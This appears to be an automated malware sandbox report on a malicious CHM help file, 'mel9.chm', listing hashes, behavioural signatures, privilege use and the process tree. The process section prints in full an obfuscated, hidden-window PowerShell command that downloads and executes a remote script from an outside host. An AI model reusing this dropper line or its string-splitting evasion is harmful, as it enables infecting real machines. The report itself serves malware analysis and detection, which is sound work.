Analysis
- max time kernel: 45s
- max time network: 49s
- platform: windows7_x64
- resource: win7-20220812-en
- resource tags: arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
- submitted: 08-12-2022 08:13
Static task: static1

Behavioral task: behavioral1
- Sample: mel9.chm
- Resource: win7-20220812-en (windows7-x64)
- 6 signatures
- 300 seconds

Behavioral task: behavioral2
- Sample: mel9.chm
- Resource: win10v2004-20220901-en (windows10-2004-x64)
- 14 signatures
- 300 seconds
General
- Target: mel9.chm
- Size: 13KB
- MD5: e7a3bc55f52eebb6ce7df0a0047fec40
- SHA1: b152e0d6abc8dab4500aaa4161dac968e54cad20
- SHA256: 908d78eb614a8ecf652163a4ccbdf62deec33d03747d4342d4f90e5bcf7995d8
- SHA512: 3537fee98df7a02510e65c4a7fbe302e154d37e5ea497fe2677936f3442afc565a4a6307a870971ca3f45a8d25bee50b71a04c515664737cbe72d4031a186a81
- SSDEEP: 192:8FYhJztroZ7rRXcAU9aoSpW9KZYtsufMCKv6:gYjtroZ7rAv9yYtsuFKv
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Deobfuscated
- URLs (ps1.dropper): https://cricot2.kylos.pl/mel9.txt
Signatures

Blocklisted process makes network request (2 IoCs)
Processes: powershell.exe
- flow 5, pid 1360, process powershell.exe
- flow 6, pid 1360, process powershell.exe

Modifies Internet Explorer settings
Processes: hh.exe
- description: Key created; ioc: \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Internet Explorer\Main; process: hh.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
Processes: powershell.exe
- pid 1360, process powershell.exe

Suspicious use of AdjustPrivilegeToken (21 IoCs)
Processes: powershell.exe (pid 1360)
- Token: SeDebugPrivilege
- Token: SeIncreaseQuotaPrivilege
- Token: SeSecurityPrivilege
- Token: SeTakeOwnershipPrivilege
- Token: SeLoadDriverPrivilege
- Token: SeSystemProfilePrivilege
- Token: SeSystemtimePrivilege
- Token: SeProfSingleProcessPrivilege
- Token: SeIncBasePriorityPrivilege
- Token: SeCreatePagefilePrivilege
- Token: SeBackupPrivilege
- Token: SeRestorePrivilege
- Token: SeShutdownPrivilege
- Token: SeDebugPrivilege
- Token: SeSystemEnvironmentPrivilege
- Token: SeRemoteShutdownPrivilege
- Token: SeUndockPrivilege
- Token: SeManageVolumePrivilege
- Token: 33
- Token: 34
- Token: 35

Suspicious use of SetWindowsHookEx (2 IoCs)
Processes: hh.exe
- pid 2004, process hh.exe
- pid 2004, process hh.exe

Suspicious use of WriteProcessMemory (3 IoCs)
Processes: hh.exe
- description: PID 2004 wrote to memory of 1360; pid 2004; process hh.exe; target process powershell.exe
- description: PID 2004 wrote to memory of 1360; pid 2004; process hh.exe; target process powershell.exe
- description: PID 2004 wrote to memory of 1360; pid 2004; process hh.exe; target process powershell.exe
Processes

1. C:\Windows\hh.exe
   Command line: "C:\Windows\hh.exe" C:\Users\Admin\AppData\Local\Temp\mel9.chm
   - Modifies Internet Explorer settings
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

2. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
   Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden $t0='DE5'.replace('D','I').replace('5','x');sal P $t0;$ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;'[void' + '] [Syst' + 'em.Refle' + 'ction.Asse' + 'mbly]::LoadWi' + 'thPartialName(''Microsoft.VisualBasic'')'|P;do {$ping = test-connection -comp google.com -count 1 -Quiet} until ($ping);$tty='(New-'+'Obje'+'ct Ne'+'t.We'+'bCli'+'ent)'|P;$mv= [Microsoft.VisualBasic.Interaction]::CallByname($tty,'Down' + 'load' + 'Str' + 'ing',[Microsoft.VisualBasic.CallType]::Method,'https' + '://cricot2.kylos.pl/mel9.txt')|P
   - Blocklisted process makes network request
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- memory/1360-55-0x0000000000000000-mapping.dmp
- memory/1360-57-0x000007FEEF550000-0x000007FEEFF73000-memory.dmp (Filesize: 10.1MB)
- memory/1360-58-0x000007FEEE9F0000-0x000007FEEF54D000-memory.dmp (Filesize: 11.4MB)
- memory/1360-60-0x0000000002694000-0x0000000002697000-memory.dmp (Filesize: 12KB)
- memory/1360-59-0x000000001B700000-0x000000001B9FF000-memory.dmp (Filesize: 3.0MB)
- memory/1360-61-0x000000000269B000-0x00000000026BA000-memory.dmp (Filesize: 124KB)
- memory/1360-62-0x0000000002694000-0x0000000002697000-memory.dmp (Filesize: 12KB)
- memory/1360-63-0x000000000269B000-0x00000000026BA000-memory.dmp (Filesize: 124KB)
- memory/2004-54-0x000007FEFC1B1000-0x000007FEFC1B3000-memory.dmp (Filesize: 8KB)